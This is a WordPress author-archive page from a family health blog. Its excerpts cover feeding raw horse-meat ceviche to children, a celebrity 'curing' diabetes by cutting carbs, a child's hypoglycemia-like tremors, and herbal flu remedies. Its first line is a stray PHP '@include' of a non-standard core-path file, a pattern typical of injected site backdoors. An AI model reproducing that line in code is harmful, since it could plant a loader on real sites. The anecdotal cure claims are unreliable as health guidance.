@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 94 of 235

Author: Good Samaritan

Son Prefers Raw Horse Meat Ceviche than cooked horse meat

Breakthrough! Yesterday at breakfast I ate some raw horse meat ceviche and I had the children taste it. It was my 9 year old boy who loved it and kept coming back for more. This morning, the maid was preparing their school lunch and she was just about to...

Drew Carey beats Diabetes Type 2 by cutting out grains and junk food

Celebrity US host Drew Carey cured himself of Type 2 diabetes and lost 80 lbs at the same time. In his own words: “No carbs,” Carey says. “I have cheated a couple times, but basically no carbs, not even a cracker. No bread at all. No pizza, nothing. No...

Hypoglycemia Symptoms described by 5 year old daughter

Last night at dinner in the usual family conversation my 5 year old daughter volunteers an experience at her class.  Wednesday is usually bread day.  Since she is not allowed bread, her teachers decided to give her an orange and an apple.  She then described that she felt tremors...

Wife has been in a Flu funk for a week

My wife has been with a flu combined with bronchitis for a week now.  She’s doing her own thing.  But it doesn’t seem to be working.  She’s on vitamin C supplements, cough elixir, foot soaks, ginger tea, avocado tea, tawa tawa tea, cayenne tincture and some cooked meat /...